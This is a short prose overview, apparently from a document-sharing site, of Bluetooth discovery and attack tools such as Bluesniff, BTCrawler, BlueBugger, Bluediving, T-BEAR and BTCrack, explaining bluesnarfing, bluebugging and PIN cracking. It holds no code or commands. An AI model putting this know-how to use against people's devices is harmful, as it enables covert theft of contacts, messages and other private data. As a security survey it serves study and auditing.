Bluetooth Tools

There are a number of utilities specifically designed to attack Bluetooth technology,
which fall in either one of two categories: discovery and exploitation. The tools for
discovering Bluetooth devices are akin to Wi-Fi wardriving, with emphasis on
specifically targeting the communication protocols used by Bluetooth. Examples of
discovery tools include Bluescan, Bluesniff, BTBrowser, and BTCrawler.
Bluescan is a GNU/Linux Bash utility that collects information about nearby
Bluetooth stations without the necessity of pairing with the device. The tool uses passive
scanning methods to determine as much as possible about the Bluetooth devices that it
discovers.
Bluesniff is a discovery tool written by the Shmoo Group that has a front-end
interface, capable of detecting both hidden and discoverable Bluetooth devices. The
application is based off an older utility known as Redfang, which had the capacity to find
hidden stations by using a brute force MAC address synchronization technique.
The BTBrowser application is Java-based, and allows the attacker to query device
information and supported profiles/service records of the Bluetooth devices it encounters.
The utility can be launched from a mobile phone to add ease of use to deployment and
remain inconspicuous.
BTCrawler is designed for Windows mobile devices and is capable of performing
service queries to determine what Bluetooth devices exist in the proximity. The most
recent version of BTCrawler supports bluejacking and bluesnarfing, which are attack
methods that exploit the Bluetooth communication protocols. Bluesnarfing is a method
in which the attacker can steal information stored on the target’s Bluetooth device
(calendar, emails, text messages, contacts, etc.) without the target’s knowledge. Until
recent Bluetooth protocol updates, devices were vulnerable to this attack method, as they
did not require pairing in order to retrieve data from each other.
The previously discussed applications give a general overview of utilities that exist to
discover Bluetooth device targets in one’s proximity. Once the attacker has found his/her
target, the next phase is to launch an attack against it. Some of the utilities that exist to
serve this purpose are BTCrack, BlueBugger, Bluesnarfer, BlueTest, BTAudit, T-BEAR,
Bluediving, and CIHWB. The utilities range from simple scripts to fully-featured
Bluetooth auditing suites.
The first utility to be discussed is BlueBugger, a program that utilizes a known
vulnerability in the Bluetooth protocol called “BlueBug.” This vulnerability is a
progression of the Bluesnarfing technique, allowing access to private information stored
on the device, without requiring the pairing or authentication phase. Bluebugging utilizes
hidden channels that are not advertised by the device’s service discovery protocol.
Within these channels are pathways to the target that do not require traditional Bluetooth
device pairing, thus the attacker has an unrestricted pathway to gain complete control of
the target.
Another utility that takes advantage of the BlueBug vulnerability is BlueDiving. It is
a suite of tools that are used for Bluetooth device penetration testing. The Bluesnarfing
technique used by a previously mentioned discovery utility is accessible via the
BlueDiving framework. In addition, the utility can perform MAC address spoofing,
connection resets, RFCOMM and AT control mechanisms. This suite of tools is similar
to T-BEAR, which is known as the Transiet Bluetooth Environment Auditor. What
differentiates T-BEAR from Bluediving is the addition of Bluetooth authentication

cracking tools. Such cracking tools include BTCrack, which performs a key intercept
attack against a Bluetooth device’s PIN by observing device pairings.
BlueTest is a simple application written in Perl whose sole function is to extract data
from vulnerable Bluetooth devices. This functionality is similar to the BlueBug utility
and it’s ability to perform Bluesnarfing.

Bluetooth Tools

Uploaded by

Copyright:

Available Formats

Bluetooth Tools

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Bluetooth Tools

Uploaded by

Copyright:

Available Formats

There are a number of utilities specifically designed to attack Bluetooth technology,

discovering Bluetooth devices are akin to Wi-Fi wardriving, with emphasis on

specifically targeting the communication protocols used by Bluetooth. Examples of

discovery tools include Bluescan, Bluesniff, BTBrowser, and BTCrawler.

Bluescan is a GNU/Linux Bash utility that collects information about nearby

hidden stations by using a brute force MAC address synchronization technique.

information and supported profiles/service records of the Bluetooth devices it encounters.

BTCrawler is designed for Windows mobile devices and is capable of performing

methods that exploit the Bluetooth communication protocols. Bluesnarfing is a method

Bluetooth auditing suites.

The first utility to be discussed is BlueBugger, a program that utilizes a known

vulnerability in the Bluetooth protocol called “BlueBug.” This vulnerability is a

progression of the Bluesnarfing technique, allowing access to private information stored

Another utility that takes advantage of the BlueBug vulnerability is BlueDiving. It is

technique used by a previously mentioned discovery utility is accessible via the

to T-BEAR, which is known as the Transiet Bluetooth Environment Auditor. What

differentiates T-BEAR from Bluediving is the addition of Bluetooth authentication

attack against a Bluetooth device’s PIN by observing device pairings.

and it’s ability to perform Bluesnarfing.

You might also like